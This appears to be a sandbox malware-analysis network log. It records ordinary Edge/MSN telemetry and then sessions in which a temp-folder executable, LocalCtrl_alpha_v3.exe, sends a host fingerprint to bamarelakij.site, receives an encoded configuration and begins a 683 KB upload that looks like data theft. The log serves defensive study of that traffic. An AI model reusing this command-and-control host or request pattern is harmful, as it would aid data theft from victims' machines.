                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                          2025-01-09 13:55:48 UTC5391OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 35 35 3a 34 36 2e 35 36 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 66 39 38 66 61 31 63 2d 33 31 38 34 2d 34 61 62 64 2d 39 37 31 62 2d 30 62 61 32 34 36 35 33 37 62 66 37 22 2c 22 65 70 6f 63 68 22 3a 22 31 35 30 32 36 33 38 31 30 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:55:46.566Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"5f98fa1c-3184-4abd-971b-0ba246537bf7","epoch":"1502638108"},"app":{"locale
                                                                                                                                                                                                                                                                          2025-01-09 13:55:48 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=b20958b3914e481da19ad0da8e2b0f23&HASH=b209&LV=202501&V=4&LU=1736430948641; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:55:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          Set-Cookie: MS0=126b0ba2ebe444bab4f0c340435c71e2; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:25:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          time-delta-millis: 2074
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:48 GMT
                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          17192.168.2.84992413.89.178.274435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:48 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430946922&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 9892
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                          2025-01-09 13:55:48 UTC9892OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 35 35 3a 34 36 2e 39 32 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 66 39 38 66 61 31 63 2d 33 31 38 34 2d 34 61 62 64 2d 39 37 31 62 2d 30 62 61 32 34 36 35 33 37 62 66 37 22 2c 22 65 70 6f 63 68 22 3a 22 31 35 30 32 36 33 38 31 30 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-09T13:55:46.921Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"5f98fa1c-3184-4abd-971b-0ba246537bf7","epoch":"1502638108"},"app":{"loc
                                                                                                                                                                                                                                                                          2025-01-09 13:55:48 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=f7d9fc537b3e4b46b2e7b1c2cf98f90b&HASH=f7d9&LV=202501&V=4&LU=1736430948768; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:55:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          Set-Cookie: MS0=57c05b318b0149ef8753696e6f2f509c; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:25:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          time-delta-millis: 1846
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:48 GMT
                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          18192.168.2.850002104.21.80.524432856C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:59 UTC354OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 147
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:55:59 UTC147OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 00 00 00 00 00 60 00 00 00 fe ff ff ff 00 00 00 00 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 c1 60 aa cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd`$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                                                                                                                                                          2025-01-09 13:56:00 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:00 GMT
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9SLvDZNhDFVs1%2FpfLFPa7GZwfVagTdXjmzo67k8kJX9qByY9gXBBNNvCq8ZlS0wKjtPf8JeUFZ0fWuAI8vdmlVutqwapsHqRo7DA7vFtggz67eClf3lsaS45XnFOqnrNj6J"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ed9bdfad7292-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1850&min_rtt=1846&rtt_var=701&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1137&delivery_rate=1549893&cwnd=252&unsent_bytes=0&cid=70582f1e615719b6&ts=421&x=0"
                                                                                                                                                                                                                                                                          2025-01-09 13:56:00 UTC593INData Raw: 33 32 66 32 0d 0a 00 00 00 00 1c 8a 00 00 f5 54 29 07 00 00 00 00 56 03 d4 02 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 4c d4 02 4e d4 89 08 0a 5c fb d8 5a 90 45 5b 4e d7 d0 6c 1d 03 f5 0b 15 00 08 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 f5 0b 57 06 36 49 41 a7 98 95 e0 e4 de cc d2 d8 ca e6 0d 03 09 0d 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 09 0d fd 57 7f 48 6c 7c b9 b1 17 ec 4c e4 d7 08 6d fa 67 0c 3b 02 15 00 0f 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 3b 02 57 06 36 49 41 a7 98 95 9c ca e8 ee de e4 d6 b8 86 de de d6 d2 ca e6 fb 06 90 02 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 31 90 02 48 34 d6 d3 2a f9 e3 d9 a7 07 a0 09 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 a0 09 ea 76 df 2c 89 bf ea 26 01 0b a2 0a 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 a2
                                                                                                                                                                                                                                                                          Data Ascii: 32f2T)VlLN\ZE[NllW6IAlWHl|Lmg;l;W6IAl1H4*lv,&l
                                                                                                                                                                                                                                                                          2025-01-09 13:56:00 UTC1369INData Raw: 09 b9 0a 15 00 0b 00 08 1f 0f 17 15 04 d9 6c 08 d9 0b b9 0a 57 06 36 49 41 a7 98 95 e6 f2 e6 e8 ca da 5c c6 de dc cc 49 0c 5c 09 15 00 06 00 08 1f 0f 17 15 04 d9 6c 08 d9 40 5c 09 57 06 36 49 41 a7 98 95 e6 c6 e4 ca ca dc 4d 0f 1e 00 15 00 0b 00 08 1f 0f 17 15 04 d9 6c 08 d9 10 1e 00 57 06 36 49 41 a7 98 95 d8 de ce d2 dc e6 5c d4 e6 de dc 62 07 96 07 15 00 0a 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 96 07 57 06 36 49 41 a7 98 95 da e6 ca c8 ce ca 5c ca f0 ca 47 01 a8 05 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 a8 05 d2 18 2d 0e b1 d1 18 04 8c 0a f2 09 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 f2 09 57 06 36 49 41 a7 98 95 86 aa a4 a4 8a 9c a8 5e 01 29 0e 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 4c 29 0e ea bd 05 65 3c 0c de 79 01 06 36 c9 87 78 0a 32
                                                                                                                                                                                                                                                                          Data Ascii: lW6IA\I\l@\W6IAMlW6IA\blW6IA\Gl-lW6IA^)lL)e<y6x2
                                                                                                                                                                                                                                                                          2025-01-09 13:56:00 UTC1369INData Raw: 04 d9 6c 08 d9 b8 0f 01 57 06 36 49 41 a7 98 95 c6 d0 e4 de da d2 ea da be c4 e4 de ee e6 ca e4 e6 28 0f 95 0d 15 00 0e 00 08 1f 0f 17 15 04 d9 6c 08 d9 b1 95 0d 57 06 36 49 41 a7 98 95 d6 de e8 c2 e8 de ce e4 c2 da 5c ca f0 ca 34 02 65 0c 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 48 65 0c 75 9a f6 50 cf d7 92 ee 9f 21 c5 fc 74 a3 46 a5 81 01 2b 00 15 00 09 00 08 1f 0f 17 15 04 d9 6c 08 d9 0b 2b 00 57 06 36 49 41 a7 98 95 ea e6 ca e4 5c c6 de dc cc 01 0f 21 08 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b1 21 08 9f 4f 57 f3 fd 82 62 f9 29 01 b1 0d 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b8 b1 0d 4d 55 5d 31 2f 7d 9d 3e 51 04 49 08 15 00 19 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 49 08 57 06 36 49 41 a7 98 95 8c d2 d8 ca b4 d2 d8 d8 c2 b8 e6 d2 e8 ca da c2 dc
                                                                                                                                                                                                                                                                          Data Ascii: lW6IA(lW6IA\4elHeuP!tF+l+W6IA\!l!OWb)lMU]1/}>QIlHIW6IA
                                                                                                                                                                                                                                                                          2025-01-09 13:56:00 UTC1369INData Raw: 7a 2c df 4e f0 05 3c ba 0e f8 94 e0 0a a2 05 15 00 0e 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 a2 05 57 06 36 49 41 a7 98 95 e0 c2 e6 e6 ee de e4 c8 e6 5c d4 e6 de dc f6 00 c8 0b 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 0b c8 0b d1 7d 7d 88 b2 b4 48 82 89 04 8a 06 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 8a 06 fe 7d b4 10 9c 55 74 1f 47 04 31 02 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 31 02 cf f5 1e c7 6a d3 e7 3f 24 4e 2d 6b d1 a7 33 74 02 09 40 07 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 40 07 24 c1 f7 78 47 08 c2 72 4e 02 84 06 15 00 20 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 84 06 57 06 36 49 41 a7 98 95 cc e8 e0 b8 ae d2 dc a6 86 a0 b8 92 dc d2 be 8c d2 d8 ca e6 b8 c2 e0 e0 88 c2 e8 c2 5c d2 dc d2 0c 00 81 0c 15 00 08 00 08 1f 0f 17 15 04 d9 6c
                                                                                                                                                                                                                                                                          Data Ascii: z,N<lW6IA\l}}Hl}UtG1l1j?$N-k3t@l@$xGrN lHW6IA\l
                                                                                                                                                                                                                                                                          2025-01-09 13:56:00 UTC1369INData Raw: 04 d9 6c 08 d9 10 74 09 57 06 36 49 41 a7 98 95 e0 e4 de cc d2 d8 ca e6 5c d2 dc d2 1d 0d 68 05 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 68 05 39 c4 cb 87 3e c5 44 8d d2 7f f8 2b 85 b1 90 c6 8c 04 e7 01 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 e7 01 b4 cf 7d 29 57 b8 cd 26 5f 74 4e 85 ec cc 19 6d 0e 00 6f 05 15 00 29 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 6f 05 57 06 36 49 41 a7 98 95 a6 de cc e8 ee c2 e4 ca b8 9a c2 e4 e8 d2 dc 40 a0 e4 d2 d6 e4 f2 d8 b8 ae d2 dc a6 86 a0 40 64 40 9e ec ca e4 e4 d2 c8 ca 6f 0b 9b 0d 15 00 12 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 9b 0d 57 06 36 49 41 a7 98 95 a6 ca c6 ea e4 ca 40 a0 e4 ca cc ca e4 ca dc c6 ca e6 52 06 37 08 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 37 08 57 06 36 49 41 a7 98 95 c6 d0 e4 de da d2 ea
                                                                                                                                                                                                                                                                          Data Ascii: ltW6IA\hlh9>D+l})W&_tNmo)lHoW6IA@@d@olW6IA@R7l7W6IA
                                                                                                                                                                                                                                                                          2025-01-09 13:56:00 UTC1369INData Raw: 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 44 06 2e 1d 36 89 4c d4 03 83 2a 0c bd 07 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b8 bd 07 55 ed 59 27 df 27 6c 2d af 0d 0c 06 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 0c 06 40 4c 62 5d 30 5d 15 7a ab f7 51 f1 8b 29 c1 31 2b 06 2f 07 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 2f 07 82 90 d9 be e1 59 ec b4 71 0e d2 07 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 0b d2 07 25 2b 64 08 46 e2 51 02 d9 0e 8c 0f 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 8c 0f c3 94 33 f7 a0 5d 06 fd f9 00 fa 09 15 00 0e 00 08 1f 0f 17 15 04 d9 6c 08 d9 10 fa 09 57 06 36 49 41 a7 98 95 c6 de de d6 d2 ca e6 5c e6 e2 d8 d2 e8 ca fa 04 d6 0d 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 31 d6 0d 38 3d 51 e2 58 f4 64 e8 90 03 60 0f 15 00 08
                                                                                                                                                                                                                                                                          Data Ascii: lD.6L*lUY''l-l@Lb]0]zQ)1+/l/Yql%+dFQl3]lW6IA\l18=QXd`
                                                                                                                                                                                                                                                                          2025-01-09 13:56:00 UTC1369INData Raw: b8 36 05 57 06 36 49 41 a7 98 95 86 74 b8 a0 e4 de ce e4 c2 da 40 8c d2 d8 ca e6 40 50 f0 70 6c 52 b8 9a d2 c6 e4 de e6 de cc e8 b8 8a c8 ce ca b8 82 e0 e0 d8 d2 c6 c2 e8 d2 de dc b8 da e6 ca c8 ce ca 5c ca f0 ca 3e 06 03 08 15 00 1f 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 03 08 57 06 36 49 41 a7 98 95 ea ec dc c6 40 c4 ec c4 c2 b8 aa d8 e8 e4 c2 ac 9c 86 b8 ea d8 e8 e4 c2 ec dc c6 5c d2 dc d2 5d 09 8d 05 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 8d 05 d6 9d b9 94 b4 50 8c 9e 32 0a f4 0e 15 00 08 00 08 1f 0f 17 15 04 d9 6c 08 d9 b1 f4 0e 57 06 36 49 41 a7 98 95 e6 ca e8 e8 d2 dc ce e6 73 00 6b 0b 15 00 13 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 6b 0b 57 06 36 49 41 a7 98 95 e0 c2 e6 e6 ee de e4 c8 e6 5c ca dc c6 da c2 e6 e8 ca e4 e6 0a 8e 07 15 00 0d 00 08 1f
                                                                                                                                                                                                                                                                          Data Ascii: 6W6IAt@@PplR\>lW6IA@\]lP2lW6IAsklkW6IA\
                                                                                                                                                                                                                                                                          2025-01-09 13:56:00 UTC1369INData Raw: 0f 17 15 04 c9 6c 04 c9 b8 ef 01 bd a4 f0 7d 37 6e c5 77 a1 06 7b 02 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 7b 02 d0 e9 8a dd b2 c1 4a d2 f5 0e 95 09 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 31 95 09 15 b4 35 53 07 82 0f 28 ff 0f 06 ff bc f6 db 63 7c 0e c1 0c 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 c1 0c 57 06 36 49 41 a7 98 95 c6 d0 e4 de da d2 ea da be c4 e4 de ee e6 ca e4 e6 02 0c 3d 02 15 00 06 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 3d 02 57 06 36 49 41 a7 98 95 a6 ca e4 ec ca e4 4f 00 84 0a 15 00 2a 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 84 0a 57 06 36 49 41 a7 98 95 9e ea e8 d8 de de d6 ae d2 dc 82 e0 e0 86 d8 c2 e6 e6 d2 c6 b8 82 e0 e0 88 c2 e8 c2 b8 98 de c6 c2 d8 b8 9e ea e8 d8 de de d6 13 01 d3 08 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9
                                                                                                                                                                                                                                                                          Data Ascii: l}7nw{l{Jl15S(c|lW6IA=l=W6IAO*lW6IAl
                                                                                                                                                                                                                                                                          2025-01-09 13:56:00 UTC1369INData Raw: 08 57 06 36 49 41 a7 98 95 9a 82 9c 92 8c 8a a6 a8 54 e4 06 45 0c 15 00 14 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 45 0c 57 06 36 49 41 a7 98 95 a8 d0 ea dc c8 ca e4 c4 d2 e4 c8 b8 a0 e4 de cc d2 d8 ca e6 91 0a d0 05 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd b8 d0 05 6e b0 78 a2 ec 20 d7 a4 80 0b 4b 0e 57 54 03 ef 87 04 5c 0d 15 00 08 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 5c 0d 57 06 36 49 41 a7 98 95 82 d8 d8 40 9a c2 d2 d8 2c 03 61 09 15 00 05 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 61 09 57 06 36 49 41 a7 98 95 54 5c c8 c2 e8 4e 06 b7 0c 15 00 0b 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 b7 0c 57 06 36 49 41 a7 98 95 98 de c6 c2 d8 40 a6 e8 c2 e8 ca 64 0f eb 0c 15 00 0e 00 08 1f 0f 17 15 04 d9 6c 08 d9 10 eb 0c 57 06 36 49 41 a7 98 95 ce ca c6 d6 de be c4 e4 de ee e6
                                                                                                                                                                                                                                                                          Data Ascii: W6IATElEW6IAlnx KWT\l\W6IA@,alaW6IAT\NlW6IA@dlW6IA


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          19192.168.2.850010104.21.80.524432856C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:01 UTC385OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 53
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:01 UTC53OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 03 00 00 00 00 02 00 00 00 fe ff ff ff 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          2025-01-09 13:56:01 UTC748INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:01 GMT
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RVvGIQLTDtqOG4aoxWcMMyv3MZI0Zo8rKPAKzG5CLsWH2NF8llDoGvUhi6tz36J%2FtcDgTbs6t46dSZ0HIXlYxRUpLuUGfOT%2BJGGRRCKIAEbvcZd9GR%2FgFYSTi%2FKyenitAxMU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4eda3ab435e80-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1724&rtt_var=648&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1074&delivery_rate=1684939&cwnd=218&unsent_bytes=0&cid=42793c781bd893e4&ts=328&x=0"
                                                                                                                                                                                                                                                                          2025-01-09 13:56:01 UTC29INData Raw: 31 37 0d 0a 00 00 00 00 07 00 00 00 fe ff ff ff 00 00 00 00 91 91 ce 09 b6 a6 61 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 17a
                                                                                                                                                                                                                                                                          2025-01-09 13:56:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          20192.168.2.850021104.21.80.524436712C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:02 UTC389OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 683229
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
